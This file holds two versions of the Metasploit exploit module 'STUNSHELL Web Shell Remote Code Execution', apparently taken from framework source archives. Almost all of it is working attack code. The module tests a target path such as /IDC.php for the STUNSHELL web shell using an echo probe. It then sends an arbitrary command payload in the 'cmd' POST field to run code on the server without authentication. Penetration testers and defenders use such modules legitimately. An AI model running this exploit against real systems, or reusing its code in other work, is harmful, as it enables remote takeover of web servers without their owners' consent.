==> metasploit-framework_4.16.32.orig.tar.gz: metasploit-framework-4.16.32/modules/exploits/multi/http/stunshell_exec.rb <==
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'STUNSHELL Web Shell Remote Code Execution',
      'Description'    => %q{
          This module exploits unauthenticated versions of the "STUNSHELL" web shell.
        This module works when safe mode is disabled on the web server.  This shell is
        widely used in automated RFI payloads.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'bwall <bwall[at]openbwall.com>' # vuln discovery & msf module
        ],
      'References'     =>
        [
          ['OSVDB', '91842'],
          ['URL', 'https://defense.ballastsecurity.net/wiki/index.php/STUNSHELL'],
          ['URL', 'https://defense.ballastsecurity.net/decoding/index.php?hash=a4cd8ba05eb6ba7fb86dd66bed968007']
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'Space'    => 10000, # Value determined by web server's POST limits
          'BadChars' => '',
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType' => 'cmd'
            }
        },
      'Platform'       => %w{ unix win },
      'Arch'           => ARCH_CMD,
      'Targets'        =>
        [
          ['stunshell / Unix', { 'Platform' => 'unix' } ],
          ['stunshell / Windows', { 'Platform' => 'win' } ]
        ],
      'DisclosureDate' => 'Mar 23 2013',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI',[true, "The path to the andalas_oku shell", "/IDC.php"]),
      ])
  end

  def check
    uri = normalize_uri(target_uri.path.to_s)
    request_parameters = {
      'method'	=> 'POST',
      'uri'		=> uri,
      'vars_post'	=>
        {
          'cmd' => "echo 'andalas_oku test parameter'"
        }
    }
    shell = send_request_cgi(request_parameters)
    if (shell and shell.body =~ /andalas_oku test parameter/)
      return Exploit::CheckCode::Vulnerable
    end
    return Exploit::CheckCode::Safe
  end

  def http_send_command(cmd)
    uri = normalize_uri(target_uri.path.to_s)
    request_parameters = {
      'method'	=> 'POST',
      'uri'		=> uri,
      'vars_post'	=>
        {
          'cmd' => cmd
        }
    }
    res = send_request_cgi(request_parameters)
    if not (res and res.code == 200)
      fail_with(Failure::Unknown, 'Failed to execute the command.')
    end
  end

  def exploit
    http_send_command(payload.encoded)
  end
end

==> metasploit-framework_6.4.71.orig.tar.gz: metasploit-framework-6.4.71/modules/exploits/multi/http/stunshell_exec.rb <==
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'STUNSHELL Web Shell Remote Code Execution',
        'Description' => %q{
          This module exploits unauthenticated versions of the "STUNSHELL" web shell.
          This module works when safe mode is disabled on the web server.  This shell is
          widely used in automated RFI payloads.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'bwall <bwall[at]openbwall.com>' # vuln discovery & msf module
        ],
        'References' => [
          ['OSVDB', '91842'],
          ['URL', 'https://defense.ballastsecurity.net/wiki/index.php/STUNSHELL'],
          ['URL', 'https://defense.ballastsecurity.net/decoding/index.php?hash=a4cd8ba05eb6ba7fb86dd66bed968007']
        ],
        'Privileged' => false,
        'Payload' => {
          'Space' => 10000, # Value determined by web server's POST limits
          'BadChars' => '',
          'DisableNops' => true,
          'Compat' =>
                        {
                          'PayloadType' => 'cmd'
                        }
        },
        'Platform' => %w{unix win},
        'Arch' => ARCH_CMD,
        'Targets' => [
          ['stunshell / Unix', { 'Platform' => 'unix' } ],
          ['stunshell / Windows', { 'Platform' => 'win' } ]
        ],
        'DisclosureDate' => '2013-03-23',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [true, "The path to the andalas_oku shell", "/IDC.php"]),
      ]
    )
  end

  def check
    uri = normalize_uri(target_uri.path.to_s)
    request_parameters = {
      'method'	=> 'POST',
      'uri'	=> uri,
      'vars_post'	=>
        {
          'cmd' => "echo 'andalas_oku test parameter'"
        }
    }
    shell = send_request_cgi(request_parameters)
    if (shell and shell.body =~ /andalas_oku test parameter/)
      return Exploit::CheckCode::Vulnerable
    end

    return Exploit::CheckCode::Safe
  end

  def http_send_command(cmd)
    uri = normalize_uri(target_uri.path.to_s)
    request_parameters = {
      'method'	=> 'POST',
      'uri'	=> uri,
      'vars_post'	=>
        {
          'cmd' => cmd
        }
    }
    res = send_request_cgi(request_parameters)
    if not (res and res.code == 200)
      fail_with(Failure::Unknown, 'Failed to execute the command.')
    end
  end

  def exploit
    http_send_command(payload.encoded)
  end
end
